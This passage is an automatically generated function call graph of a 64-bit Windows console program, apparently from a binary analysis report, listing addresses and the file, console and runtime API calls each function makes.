calls 38714->38715 38716 7ff629b3b444 LoadLibraryW 38715->38716 38716->38713 38718 7ff629b37f72 38717->38718 38718->38702 38718->38703 38719->38706 38720->38708 38721->38701 38723 7ff629b3b3fc GetSystemDirectoryW 38722->38723 38723->38713 38723->38714 38727 7ff629b3ba70 GetCurrentProcess GetProcessAffinityMask 38724->38727 38728 7ff629b189c5 38727->38728 38728->38412 38732 7ff629b29245 38729->38732 38731 7ff629b292b1 38738 7ff629b16194 72 API calls 38731->38738 38737 7ff629b16194 72 API calls 38732->38737 38734 7ff629b292bd 38739 7ff629b16194 72 API calls 38734->38739 38736 7ff629b292c9 38737->38731 38738->38734 38739->38736 38740->38426 38741->38432 38742->38431 38743->38435 38744->38423 38745->38427 38746->38425 38747->38440 38748 7ff629b4b0fc 38767 7ff629b4aa8c 38748->38767 38752 7ff629b4b148 38758 7ff629b4b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38752->38758 38775 7ff629b5472c 38752->38775 38753 7ff629b4b123 __scrt_acquire_startup_lock 38753->38752 38823 7ff629b4b52c 7 API calls memcpy_s 38753->38823 38756 7ff629b4b16d 38757 7ff629b4b1f7 38779 7ff629b53fc4 38757->38779 38758->38756 38758->38757 38824 7ff629b52574 35 API calls IsInExceptionSpec 38758->38824 38766 7ff629b4b220 38825 7ff629b4ac64 8 API calls 2 library calls 38766->38825 38768 7ff629b4aaae __isa_available_init 38767->38768 38826 7ff629b4e2f8 38768->38826 38773 7ff629b4aab7 38773->38753 38822 7ff629b4b52c 7 API calls memcpy_s 38773->38822 38777 7ff629b54744 38775->38777 38776 7ff629b54766 38776->38758 38777->38776 38875 7ff629b4b010 38777->38875 38780 7ff629b53fd4 38779->38780 38781 7ff629b4b20c 38779->38781 38967 7ff629b53c84 38780->38967 38783 7ff629b27e20 38781->38783 39007 7ff629b3b470 GetModuleHandleW 38783->39007 38789 7ff629b27e58 SetErrorMode GetModuleHandleW 38790 7ff629b348cc 21 API calls 38789->38790 38791 7ff629b27e7d 38790->38791 38792 7ff629b33e48 137 API calls 38791->38792 38793 7ff629b27e90 38792->38793 38794 7ff629b03d3c 126 API calls 38793->38794 38795 7ff629b27e9c 38794->38795 38796 7ff629b4a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38795->38796 38797 7ff629b27ead 38796->38797 38798 7ff629b27ebf 38797->38798 38799 7ff629b03f18 70 API calls 38797->38799 38800 7ff629b04d1c 157 API calls 38798->38800 38799->38798 38801 7ff629b27ed6 38800->38801 38802 7ff629b27eef 38801->38802 38804 7ff629b06ad0 154 API calls 38801->38804 38803 7ff629b04d1c 157 API calls 38802->38803 38805 7ff629b27eff 38803->38805 38806 7ff629b27ee7 38804->38806 38808 7ff629b27f0d 38805->38808 38810 7ff629b27f14 38805->38810 38807 7ff629b04e48 160 API calls 38806->38807 38807->38802 38809 7ff629b3b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38808->38809 38809->38810 38811 7ff629b04888 58 API calls 38810->38811 38812 7ff629b27f57 38811->38812 38813 7ff629b04fd0 268 API calls 38812->38813 38815 7ff629b27f5f 38813->38815 38814 7ff629b27f9e 38820 7ff629b4b684 GetModuleHandleW 38814->38820 38815->38814 38816 7ff629b27f8c 38815->38816 38817 7ff629b3b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38816->38817 38818 7ff629b27f93 38817->38818 38818->38814 38819 7ff629b3b57c 14 API calls 38818->38819 38819->38814 38821 7ff629b4b698 38820->38821 38821->38766 38822->38753 38823->38752 38824->38757 38825->38756 38827 7ff629b4e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38826->38827 38839 7ff629b4eb08 38827->38839 38830 7ff629b4aab3 38830->38773 38834 7ff629b545e4 38830->38834 38832 7ff629b4e318 38832->38830 38846 7ff629b4eb50 DeleteCriticalSection 38832->38846 38835 7ff629b59d4c 38834->38835 38836 7ff629b4aac0 38835->38836 38863 7ff629b566c0 38835->38863 38836->38773 38838 7ff629b4e32c 8 API calls 3 library calls 38836->38838 38838->38773 38841 7ff629b4eb10 38839->38841 38842 7ff629b4eb41 38841->38842 38843 7ff629b4e30b 38841->38843 38847 7ff629b4e678 38841->38847 38852 7ff629b4eb50 DeleteCriticalSection 38842->38852 38843->38830 38845 7ff629b4e8a4 8 API calls 3 library calls 38843->38845 38845->38832 38846->38830 38853 7ff629b4e34c 38847->38853 38850 7ff629b4e6cf InitializeCriticalSectionAndSpinCount 38851 7ff629b4e6bb 38850->38851 38851->38841 38852->38843 38854 7ff629b4e3b2 38853->38854 38859 7ff629b4e3ad 38853->38859 38854->38850 38854->38851 38855 7ff629b4e47a 38855->38854 38857 7ff629b4e489 GetProcAddress 38855->38857 38856 7ff629b4e3e5 LoadLibraryExW 38858 7ff629b4e40b GetLastError 38856->38858 38856->38859 38857->38854 38860 7ff629b4e4a1 38857->38860 38858->38859 38861 7ff629b4e416 LoadLibraryExW 38858->38861 38859->38854 38859->38855 38859->38856 38862 7ff629b4e458 FreeLibrary 38859->38862 38860->38854 38861->38859 38862->38859 38874 7ff629b56938 EnterCriticalSection 38863->38874 38865 7ff629b566d0 38866 7ff629b58050 32 API calls 38865->38866 38867 7ff629b566d9 38866->38867 38868 7ff629b566e7 38867->38868 38869 7ff629b564d0 34 API calls 38867->38869 38870 7ff629b56998 fflush LeaveCriticalSection 38868->38870 38871 7ff629b566e2 38869->38871 38872 7ff629b566f3 38870->38872 38873 7ff629b565bc GetStdHandle GetFileType 38871->38873 38872->38835 38873->38868 38876 7ff629b4b020 pre_c_initialization 38875->38876 38896 7ff629b52b00 38876->38896 38878 7ff629b4b02c pre_c_initialization 38902 7ff629b4aad8 38878->38902 38880 7ff629b4b045 38881 7ff629b4b049 _RTC_Initialize 38880->38881 38882 7ff629b4b0b5 38880->38882 38907 7ff629b4ace0 38881->38907 38939 7ff629b4b52c 7 API calls memcpy_s 38882->38939 38884 7ff629b4b0bf 38940 7ff629b4b52c 7 API calls memcpy_s 38884->38940 38886 7ff629b4b05a pre_c_initialization 38910 7ff629b53b0c 38886->38910 38888 7ff629b4b0ca __scrt_initialize_default_local_stdio_options 38888->38777 38891 7ff629b4b06a 38938 7ff629b4b7dc RtlInitializeSListHead 38891->38938 38893 7ff629b4b06f pre_c_initialization __InternalCxxFrameHandler 38894 7ff629b54818 pre_c_initialization 35 API calls 38893->38894 38895 7ff629b4b09a pre_c_initialization 38894->38895 38895->38777 38897 7ff629b52b11 38896->38897 38898 7ff629b52b19 38897->38898 38941 7ff629b54f3c 15 API calls memcpy_s 38897->38941 38898->38878 38900 7ff629b52b28 38942 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 38900->38942 38903 7ff629b4ab96 38902->38903 38906 7ff629b4aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 38902->38906 38943 7ff629b4b52c 7 API calls memcpy_s 38903->38943 38905 7ff629b4aba0 38906->38880 38944 7ff629b4ac90 38907->38944 38909 7ff629b4ace9 38909->38886 38911 7ff629b53b2a 38910->38911 38912 7ff629b53b40 38910->38912 38949 7ff629b54f3c 15 API calls memcpy_s 38911->38949 38951 7ff629b59370 38912->38951 38915 7ff629b53b2f 38950 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 38915->38950 38918 7ff629b53b72 38955 7ff629b538ec 35 API calls pre_c_initialization 38918->38955 38919 7ff629b4b066 38919->38884 38919->38891 38921 7ff629b53b9c 38956 7ff629b53aa8 15 API calls __vcrt_getptd_noexit 38921->38956 38923 7ff629b53bb2 38924 7ff629b53bba 38923->38924 38925 7ff629b53bcb 38923->38925 38957 7ff629b54f3c 15 API calls memcpy_s 38924->38957 38958 7ff629b538ec 35 API calls pre_c_initialization 38925->38958 38928 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38928->38919 38929 7ff629b53be7 38930 7ff629b53c17 38929->38930 38931 7ff629b53c30 38929->38931 38935 7ff629b53bbf 38929->38935 38959 7ff629b54a74 38930->38959 38933 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38931->38933 38933->38935 38934 7ff629b53c20 38936 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38934->38936 38935->38928 38937 7ff629b53c2c 38936->38937 38937->38919 38939->38884 38940->38888 38941->38900 38942->38898 38943->38905 38945 7ff629b4acbf 38944->38945 38947 7ff629b4acb5 _onexit 38944->38947 38948 7ff629b54434 34 API calls _onexit 38945->38948 38947->38909 38948->38947 38949->38915 38950->38919 38952 7ff629b5937d 38951->38952 38953 7ff629b53b45 GetModuleFileNameA 38951->38953 38965 7ff629b591b0 48 API calls 5 library calls 38952->38965 38953->38918 38955->38921 38956->38923 38957->38935 38958->38929 38960 7ff629b54a79 RtlRestoreThreadPreferredUILanguages 38959->38960 38964 7ff629b54aa9 __vcrt_getptd_noexit 38959->38964 38961 7ff629b54a94 38960->38961 38960->38964 38966 7ff629b54f3c 15 API calls memcpy_s 38961->38966 38963 7ff629b54a99 GetLastError 38963->38964 38964->38934 38965->38953 38966->38963 38968 7ff629b53c98 38967->38968 38972 7ff629b53ca1 38967->38972 38968->38972 38973 7ff629b53ccc 38968->38973 38972->38781 38974 7ff629b53ce5 38973->38974 38983 7ff629b53caa 38973->38983 38975 7ff629b59370 pre_c_initialization 48 API calls 38974->38975 38976 7ff629b53cea 38975->38976 38986 7ff629b5978c GetEnvironmentStringsW 38976->38986 38979 7ff629b53cf7 38982 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38979->38982 38981 7ff629b53d04 38984 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38981->38984 38982->38983 38983->38972 38985 7ff629b53e78 17 API calls __vcrt_getptd_noexit 38983->38985 38984->38979 38985->38972 38987 7ff629b597ba WideCharToMultiByte 38986->38987 38988 7ff629b5985e 38986->38988 38987->38988 38992 7ff629b59814 38987->38992 38990 7ff629b59868 FreeEnvironmentStringsW 38988->38990 38991 7ff629b53cef 38988->38991 38990->38991 38991->38979 38998 7ff629b53d38 31 API calls 3 library calls 38991->38998 38999 7ff629b54ab4 38992->38999 38995 7ff629b5984b 38997 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38995->38997 38996 7ff629b59824 WideCharToMultiByte 38996->38995 38997->38988 38998->38981 39000 7ff629b54aff 38999->39000 39005 7ff629b54ac3 __vcrt_getptd_noexit 38999->39005 39006 7ff629b54f3c 15 API calls memcpy_s 39000->39006 39002 7ff629b54ae6 RtlAllocateHeap 39003 7ff629b54afd 39002->39003 39002->39005 39003->38995 39003->38996 39004 7ff629b536c0 new 2 API calls 39004->39005 39005->39000 39005->39002 39005->39004 39006->39003 39008 7ff629b3b496 GetProcAddress 39007->39008 39009 7ff629b27e45 39007->39009 39010 7ff629b3b4cb GetProcAddress 39008->39010 39011 7ff629b3b4ae 39008->39011 39012 7ff629b07a68 39009->39012 39010->39009 39011->39010 39013 7ff629b07a76 39012->39013 39033 7ff629b52ae4 39013->39033 39015 7ff629b07a80 39016 7ff629b52ae4 setbuf 60 API calls 39015->39016 39017 7ff629b07a94 39016->39017 39042 7ff629b07b44 GetStdHandle GetFileType 39017->39042 39020 7ff629b07b44 3 API calls 39021 7ff629b07aae 39020->39021 39022 7ff629b07b44 3 API calls 39021->39022 39024 7ff629b07abe 39022->39024 39023 7ff629b07b12 39032 7ff629b0cd78 SetConsoleCtrlHandler 39023->39032 39026 7ff629b07aeb 39024->39026 39045 7ff629b52abc 31 API calls 2 library calls 39024->39045 39026->39023 39047 7ff629b52abc 31 API calls 2 library calls 39026->39047 39027 7ff629b07adf 39046 7ff629b52b40 33 API calls 3 library calls 39027->39046 39030 7ff629b07b06 39048 7ff629b52b40 33 API calls 3 library calls 39030->39048 39034 7ff629b52ae9 39033->39034 39035 7ff629b57ee8 39034->39035 39038 7ff629b57f23 39034->39038 39049 7ff629b54f3c 15 API calls memcpy_s 39035->39049 39037 7ff629b57eed 39050 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 39037->39050 39051 7ff629b57d98 60 API calls 2 library calls 39038->39051 39041 7ff629b57ef8 39041->39015 39043 7ff629b07b61 GetConsoleMode 39042->39043 39044 7ff629b07a9e 39042->39044 39043->39044 39044->39020 39045->39027 39046->39026 39047->39030 39048->39023 39049->39037 39050->39041 39051->39041 39052 7ff629b5231c 39053 7ff629b5238c 39052->39053 39054 7ff629b52342 GetModuleHandleW 39052->39054 39065 7ff629b56938 EnterCriticalSection 39053->39065 39054->39053 39058 7ff629b5234f 39054->39058 39056 7ff629b56998 fflush LeaveCriticalSection 39057 7ff629b52460 39056->39057 39060 7ff629b5246c 39057->39060 39064 7ff629b52488 11 API calls 39057->39064 39058->39053 39066 7ff629b524d4 GetModuleHandleExW 39058->39066 39059 7ff629b52410 39059->39056 39061 7ff629b52396 39061->39059 39062 7ff629b543b8 16 API calls 39061->39062 39062->39059 39064->39060 39067 7ff629b52525 39066->39067 39068 7ff629b524fe GetProcAddress 39066->39068 39070 7ff629b52535 39067->39070 39071 7ff629b5252f FreeLibrary 39067->39071 39068->39067 39069 7ff629b52518 39068->39069 39069->39067 39070->39053 39071->39070 39072 7ff629af3b53 39073 7ff629af3b64 39072->39073 39123 7ff629b11e80 39073->39123 39074 7ff629af3c09 39135 7ff629b123f0 39074->39135 39075 7ff629af3bb6 39075->39074 39077 7ff629af3c18 39075->39077 39078 7ff629af3c01 39075->39078 39145 7ff629af8050 157 API calls 39077->39145 39140 7ff629b11c24 39078->39140 39081 7ff629af3c3d 39146 7ff629af8010 13 API calls 39081->39146 39082 7ff629af3ccc 39104 7ff629af3c90 39082->39104 39153 7ff629b12414 61 API calls 39082->39153 39085 7ff629af3c45 39088 7ff629af3c54 39085->39088 39147 7ff629b0cba8 75 API calls 39085->39147 39087 7ff629af3cf9 39154 7ff629b11998 138 API calls 39087->39154 39148 7ff629afa9d4 186 API calls wcschr 39088->39148 39092 7ff629af3c5c 39149 7ff629af93ac 8 API calls 39092->39149 39093 7ff629af3d10 39155 7ff629b118ac 39093->39155 39096 7ff629af3c66 39098 7ff629af3c77 39096->39098 39150 7ff629b0ca40 61 API calls _CxxThrowException 39096->39150 39151 7ff629af8090 8 API calls 39098->39151 39101 7ff629af3c7f 39101->39104 39152 7ff629b0ca40 61 API calls _CxxThrowException 39101->39152 39162 7ff629b3d400 48 API calls 39104->39162 39124 7ff629b11e95 setbuf 39123->39124 39125 7ff629b11ecb CreateFileW 39124->39125 39126 7ff629b11f59 GetLastError 39125->39126 39127 7ff629b11fb8 39125->39127 39128 7ff629b24534 10 API calls 39126->39128 39129 7ff629b11ff7 39127->39129 39131 7ff629b11fd9 SetFileTime 39127->39131 39130 7ff629b11f74 39128->39130 39133 7ff629b4a610 _handle_error 8 API calls 39129->39133 39130->39127 39132 7ff629b11f78 CreateFileW GetLastError 39130->39132 39131->39129 39132->39127 39134 7ff629b1203a 39133->39134 39134->39075 39163 7ff629b124e8 39135->39163 39138 7ff629b1240e 39138->39082 39141 7ff629b11c37 39140->39141 39142 7ff629b11c3b 39140->39142 39141->39074 39142->39141 39143 7ff629b11c5d 39142->39143 39180 7ff629b12d6c 12 API calls 2 library calls 39143->39180 39145->39081 39146->39085 39148->39092 39149->39096 39150->39098 39151->39101 39152->39104 39153->39087 39154->39093 39156 7ff629b118ca 39155->39156 39161 7ff629b118db 39155->39161 39157 7ff629b118d6 39156->39157 39158 7ff629b118de 39156->39158 39156->39161 39160 7ff629b11c24 12 API calls 39157->39160 39181 7ff629b11930 39158->39181 39160->39161 39161->39104 39169 7ff629b11af0 39163->39169 39166 7ff629b123f9 39166->39138 39168 7ff629b0ca40 61 API calls _CxxThrowException 39166->39168 39168->39138 39170 7ff629b11b01 setbuf 39169->39170 39171 7ff629b11b6f CreateFileW 39170->39171 39172 7ff629b11b68 39170->39172 39171->39172 39173 7ff629b11be1 39172->39173 39174 7ff629b24534 10 API calls 39172->39174 39177 7ff629b4a610 _handle_error 8 API calls 39173->39177 39175 7ff629b11bb3 39174->39175 39175->39173 39176 7ff629b11bb7 CreateFileW 39175->39176 39176->39173 39178 7ff629b11c14 39177->39178 39178->39166 39179 7ff629b0ca08 10 API calls 39178->39179 39179->39166 39180->39141 39182 7ff629b11964 39181->39182 39183 7ff629b1194c 39181->39183 39184 7ff629b11988 39182->39184 39187 7ff629b0c9d0 10 API calls 39182->39187 39183->39182 39185 7ff629b11958 FindCloseChangeNotification 39183->39185 39184->39161 39185->39182 39187->39184 39188 7ff629af82f0 39189 7ff629af8306 39188->39189 39198 7ff629af836f 39188->39198 39190 7ff629af8324 39189->39190 39194 7ff629af8371 39189->39194 39189->39198 39308 7ff629b12414 61 API calls 39190->39308 39192 7ff629af8347 39309 7ff629b11998 138 API calls 39192->39309 39194->39198 39310 7ff629b11998 138 API calls 39194->39310 39195 7ff629af835e 39197 7ff629b118ac 15 API calls 39195->39197 39197->39198 39211 7ff629afa410 39198->39211 39202 7ff629af8578 39203 7ff629afb540 147 API calls 39202->39203 39208 7ff629af858f 39203->39208 39204 7ff629afb540 147 API calls 39204->39202 39205 7ff629af8634 39206 7ff629b4a610 _handle_error 8 API calls 39205->39206 39207 7ff629af8663 39206->39207 39208->39205 39311 7ff629af9628 175 API calls 39208->39311 39312 7ff629b27a68 39211->39312 39214 7ff629af853a 39216 7ff629afb540 39214->39216 39221 7ff629afb55f setbuf 39216->39221 39217 7ff629afb5a1 39218 7ff629afb5d8 39217->39218 39219 7ff629afb5b8 39217->39219 39460 7ff629b28c1c 39218->39460 39346 7ff629afaba0 39219->39346 39221->39217 39342 7ff629afa4d0 39221->39342 39223 7ff629b4a610 _handle_error 8 API calls 39224 7ff629af854f 39223->39224 39224->39202 39224->39204 39225 7ff629afb67f 39226 7ff629afbc91 39225->39226 39227 7ff629afb6a5 39225->39227 39228 7ff629afbbae 39225->39228 39229 7ff629b12574 126 API calls 39226->39229 39306 7ff629afb5d3 39226->39306 39238 7ff629afb6b5 39227->39238 39257 7ff629afb79f 39227->39257 39227->39306 39230 7ff629b28d00 48 API calls 39228->39230 39229->39306 39233 7ff629afbc5c 39230->39233 39529 7ff629b28d38 48 API calls 39233->39529 39237 7ff629afbc69 39530 7ff629b28d38 48 API calls 39237->39530 39238->39306 39494 7ff629b28d00 39238->39494 39240 7ff629afbc76 39531 7ff629b28d38 48 API calls 39240->39531 39242 7ff629afbc84 39532 7ff629b28d88 48 API calls 39242->39532 39247 7ff629afb726 39498 7ff629b28d38 48 API calls 39247->39498 39249 7ff629afb733 39250 7ff629afb749 39249->39250 39499 7ff629b28d88 48 API calls 39249->39499 39252 7ff629afb75c 39250->39252 39500 7ff629b28d38 48 API calls 39250->39500 39254 7ff629afb779 39252->39254 39256 7ff629b28d00 48 API calls 39252->39256 39501 7ff629b28f94 39254->39501 39256->39252 39258 7ff629afb8e5 39257->39258 39511 7ff629afc3c8 CharLowerW CharUpperW 39257->39511 39512 7ff629b3d840 WideCharToMultiByte 39258->39512 39262 7ff629afb9a1 39264 7ff629b28d00 48 API calls 39262->39264 39266 7ff629afb9c4 39264->39266 39265 7ff629afb910 39265->39262 39514 7ff629af945c 55 API calls _handle_error 39265->39514 39515 7ff629b28d38 48 API calls 39266->39515 39268 7ff629afb9d1 39516 7ff629b28d38 48 API calls 39268->39516 39270 7ff629afb9de 39517 7ff629b28d88 48 API calls 39270->39517 39272 7ff629afb9eb 39518 7ff629b28d88 48 API calls 39272->39518 39274 7ff629afba0b 39275 7ff629b28d00 48 API calls 39274->39275 39276 7ff629afba27 39275->39276 39519 7ff629b28d88 48 API calls 39276->39519 39278 7ff629afba37 39279 7ff629afba49 39278->39279 39520 7ff629b3bc48 15 API calls 39278->39520 39521 7ff629b28d88 48 API calls 39279->39521 39282 7ff629afba59 39283 7ff629b28d00 48 API calls 39282->39283 39284 7ff629afba66 39283->39284 39285 7ff629b28d00 48 API calls 39284->39285 39286 7ff629afba78 39285->39286 39522 7ff629b28d38 48 API calls 39286->39522 39288 7ff629afba85 39523 7ff629b28d88 48 API calls 39288->39523 39290 7ff629afba92 39291 7ff629afbacd 39290->39291 39524 7ff629b28d88 48 API calls 39290->39524 39526 7ff629b28e3c 39291->39526 39294 7ff629afbab2 39525 7ff629b28d88 48 API calls 39294->39525 39295 7ff629afbaf2 39296 7ff629afbb33 39295->39296 39298 7ff629b28d00 48 API calls 39295->39298 39300 7ff629afbb09 39295->39300 39299 7ff629afbb53 39296->39299 39302 7ff629b28e3c 48 API calls 39296->39302 39298->39300 39303 7ff629afbb6e 39299->39303 39304 7ff629b28e3c 48 API calls 39299->39304 39300->39296 39301 7ff629b28e3c 48 API calls 39300->39301 39301->39296 39302->39299 39305 7ff629b28f94 126 API calls 39303->39305 39304->39303 39305->39306 39306->39223 39308->39192 39309->39195 39310->39198 39311->39205 39313 7ff629afa434 39312->39313 39315 7ff629b27a8d 39312->39315 39313->39214 39320 7ff629b122e0 39313->39320 39314 7ff629b27aaf 39314->39313 39316 7ff629b122e0 12 API calls 39314->39316 39315->39314 39325 7ff629b27340 157 API calls 39315->39325 39318 7ff629b27adf 39316->39318 39326 7ff629b12440 39318->39326 39336 7ff629b120b4 39320->39336 39322 7ff629b12307 39322->39214 39325->39314 39327 7ff629b1246a SetFilePointer 39326->39327 39328 7ff629b12454 39326->39328 39329 7ff629b124ad 39327->39329 39330 7ff629b1248d GetLastError 39327->39330 39328->39329 39334 7ff629b0cd00 10 API calls 39328->39334 39329->39313 39330->39329 39332 7ff629b12497 39330->39332 39332->39329 39335 7ff629b0cd00 10 API calls 39332->39335 39337 7ff629b12130 39336->39337 39340 7ff629b120d0 39336->39340 39337->39322 39341 7ff629b0cd00 10 API calls 39337->39341 39338 7ff629b12102 SetFilePointer 39338->39337 39339 7ff629b12126 GetLastError 39338->39339 39339->39337 39340->39338 39343 7ff629afa4ea 39342->39343 39344 7ff629afa4ee 39343->39344 39345 7ff629b12440 12 API calls 39343->39345 39344->39217 39345->39344 39347 7ff629afabbf setbuf 39346->39347 39348 7ff629b28c1c 48 API calls 39347->39348 39354 7ff629afabf5 39348->39354 39349 7ff629afaca7 39350 7ff629afb4af 39349->39350 39351 7ff629afacbf 39349->39351 39355 7ff629afb4ff 39350->39355 39357 7ff629b12574 126 API calls 39350->39357 39352 7ff629afb35c 39351->39352 39353 7ff629afacc8 39351->39353 39359 7ff629b28eec 48 API calls 39352->39359 39361 7ff629afacdd 39353->39361 39394 7ff629afaea7 39353->39394 39459 7ff629afad60 39353->39459 39354->39349 39354->39350 39356 7ff629b09be0 14 API calls 39354->39356 39358 7ff629b272c0 4 API calls 39355->39358 39362 7ff629afac34 39356->39362 39357->39355 39358->39459 39360 7ff629afb395 39359->39360 39363 7ff629afb3ad 39360->39363 39551 7ff629af9e2c 48 API calls 39360->39551 39364 7ff629afad68 39361->39364 39365 7ff629aface6 39361->39365 39366 7ff629b090b8 75 API calls 39362->39366 39370 7ff629b28eec 48 API calls 39363->39370 39368 7ff629b28eec 48 API calls 39364->39368 39365->39459 39533 7ff629b28eec 39365->39533 39371 7ff629afac8f 39366->39371 39372 7ff629afad9c 39368->39372 39369 7ff629b4a610 _handle_error 8 API calls 39373 7ff629afb52b 39369->39373 39374 7ff629afb3d4 39370->39374 39371->39349 39379 7ff629b12574 126 API calls 39371->39379 39376 7ff629b28eec 48 API calls 39372->39376 39373->39306 39377 7ff629afb3e6 39374->39377 39381 7ff629b28eec 48 API calls 39374->39381 39380 7ff629afada9 39376->39380 39384 7ff629b28eec 48 API calls 39377->39384 39379->39349 39383 7ff629b28eec 48 API calls 39380->39383 39381->39377 39382 7ff629b28eec 48 API calls 39385 7ff629afad31 39382->39385 39386 7ff629afadb5 39383->39386 39387 7ff629afb451 39384->39387 39388 7ff629b28eec 48 API calls 39385->39388 39389 7ff629b28eec 48 API calls 39386->39389 39390 7ff629afb471 39387->39390 39396 7ff629b28eec 48 API calls 39387->39396 39391 7ff629afad46 39388->39391 39393 7ff629afadc2 39389->39393 39392 7ff629afb486 39390->39392 39397 7ff629b28e3c 48 API calls 39390->39397 39395 7ff629b28f94 126 API calls 39391->39395 39398 7ff629b28f94 126 API calls 39392->39398 39399 7ff629b28d00 48 API calls 39393->39399 39400 7ff629afafda 39394->39400 39541 7ff629af9b64 48 API calls _handle_error 39394->39541 39395->39459 39396->39390 39397->39392 39398->39459 39401 7ff629afadcf 39399->39401 39407 7ff629afaff2 39400->39407 39542 7ff629af9d98 48 API calls 39400->39542 39403 7ff629b090b8 75 API calls 39401->39403 39405 7ff629afae22 39403->39405 39406 7ff629b28e3c 48 API calls 39405->39406 39408 7ff629afae33 39406->39408 39412 7ff629afb02b 39407->39412 39543 7ff629af9efc 48 API calls _handle_error 39407->39543 39409 7ff629b28e3c 48 API calls 39408->39409 39410 7ff629afae48 39409->39410 39418 7ff629b39ce4 8 API calls 39410->39418 39411 7ff629afb0af 39415 7ff629afb0c8 39411->39415 39545 7ff629afa1a0 48 API calls 2 library calls 39411->39545 39412->39411 39544 7ff629afa2c8 48 API calls 39412->39544 39417 7ff629afb0e2 39415->39417 39546 7ff629afa350 48 API calls _handle_error 39415->39546 39421 7ff629b28eec 48 API calls 39417->39421 39420 7ff629afae60 39418->39420 39422 7ff629b39b70 8 API calls 39420->39422 39423 7ff629afb0fc 39421->39423 39424 7ff629afae6d 39422->39424 39425 7ff629b28eec 48 API calls 39423->39425 39426 7ff629b28e3c 48 API calls 39424->39426 39427 7ff629afb109 39425->39427 39428 7ff629afae80 39426->39428 39429 7ff629afb11f 39427->39429 39432 7ff629b28eec 48 API calls 39427->39432 39431 7ff629b28f94 126 API calls 39428->39431 39537 7ff629b28e94 39429->39537 39431->39459 39432->39429 39434 7ff629b28eec 48 API calls 39435 7ff629afb147 39434->39435 39436 7ff629b28e94 48 API calls 39435->39436 39437 7ff629afb15f 39436->39437 39438 7ff629b28eec 48 API calls 39437->39438 39442 7ff629afb16c 39438->39442 39439 7ff629afb18a 39440 7ff629afb1a9 39439->39440 39548 7ff629b28d88 48 API calls 39439->39548 39441 7ff629b28e94 48 API calls 39440->39441 39444 7ff629afb1bc 39441->39444 39442->39439 39547 7ff629b28d88 48 API calls 39442->39547 39446 7ff629b28eec 48 API calls 39444->39446 39447 7ff629afb1d6 39446->39447 39449 7ff629afb1e9 39447->39449 39549 7ff629afc3c8 CharLowerW CharUpperW 39447->39549 39449->39449 39450 7ff629b28eec 48 API calls 39449->39450 39451 7ff629afb21f 39450->39451 39452 7ff629b28e3c 48 API calls 39451->39452 39453 7ff629afb230 39452->39453 39454 7ff629afb247 39453->39454 39455 7ff629b28e3c 48 API calls 39453->39455 39456 7ff629b28f94 126 API calls 39454->39456 39455->39454 39457 7ff629afb278 39456->39457 39457->39459 39550 7ff629b270d8 4 API calls 2 library calls 39457->39550 39459->39369 39552 7ff629b28f28 39460->39552 39463 7ff629b090b8 39464 7ff629b091a9 39463->39464 39465 7ff629b09123 39463->39465 39466 7ff629b4a610 _handle_error 8 API calls 39464->39466 39465->39464 39570 7ff629b37e74 39465->39570 39468 7ff629afb66e 39466->39468 39479 7ff629b12574 39468->39479 39470 7ff629b3d840 WideCharToMultiByte 39471 7ff629b09157 39470->39471 39471->39464 39472 7ff629b0916a 39471->39472 39473 7ff629b091c4 39471->39473 39474 7ff629b091ab 39472->39474 39475 7ff629b0916f 39472->39475 39589 7ff629b09338 12 API calls _handle_error 39473->39589 39588 7ff629b0951c 71 API calls _handle_error 39474->39588 39475->39464 39574 7ff629b098b0 39475->39574 39480 7ff629b1259e 39479->39480 39481 7ff629b125a5 39479->39481 39480->39225 39482 7ff629b125ab GetStdHandle 39481->39482 39489 7ff629b125ba 39481->39489 39482->39489 39483 7ff629b12619 WriteFile 39483->39489 39484 7ff629b125cf WriteFile 39485 7ff629b1260b 39484->39485 39484->39489 39485->39484 39485->39489 39486 7ff629b12658 GetLastError 39486->39489 39488 7ff629b12684 SetLastError 39488->39489 39489->39480 39489->39483 39489->39484 39489->39486 39491 7ff629b12721 39489->39491 39654 7ff629b13144 9 API calls 2 library calls 39489->39654 39655 7ff629b0cf34 10 API calls 39489->39655 39656 7ff629b0c95c 126 API calls 39489->39656 39657 7ff629b0cf14 10 API calls 39491->39657 39495 7ff629af161c 48 API calls 39494->39495 39496 7ff629afb719 39495->39496 39497 7ff629b28d38 48 API calls 39496->39497 39497->39247 39498->39249 39499->39250 39500->39252 39502 7ff629b29131 39501->39502 39503 7ff629b28fcf 39501->39503 39502->39306 39504 7ff629b2905d 39503->39504 39658 7ff629b0ca6c 48 API calls 3 library calls 39503->39658 39505 7ff629b290e0 39504->39505 39506 7ff629af161c 48 API calls 39504->39506 39505->39502 39507 7ff629b12574 126 API calls 39505->39507 39506->39505 39507->39502 39509 7ff629b2904c 39659 7ff629b0ca40 61 API calls _CxxThrowException 39509->39659 39511->39258 39513 7ff629afb8f8 CharToOemA 39512->39513 39513->39265 39514->39262 39515->39268 39516->39270 39517->39272 39518->39274 39519->39278 39520->39279 39521->39282 39522->39288 39523->39290 39524->39294 39525->39291 39527 7ff629af161c 48 API calls 39526->39527 39528 7ff629b28e5c 39527->39528 39528->39295 39528->39528 39529->39237 39530->39240 39531->39242 39532->39226 39534 7ff629b28efc 39533->39534 39535 7ff629b28d00 48 API calls 39534->39535 39536 7ff629afad24 39534->39536 39535->39534 39536->39382 39538 7ff629b28eac 39537->39538 39539 7ff629b28d00 48 API calls 39538->39539 39540 7ff629afb137 39538->39540 39539->39538 39540->39434 39541->39400 39542->39407 39543->39412 39544->39411 39545->39415 39546->39417 39547->39439 39548->39440 39549->39449 39550->39459 39551->39363 39555 7ff629af161c 39552->39555 39554 7ff629afb601 39554->39225 39554->39226 39554->39463 39557 7ff629af1640 39555->39557 39565 7ff629af16aa memcpy_s 39555->39565 39556 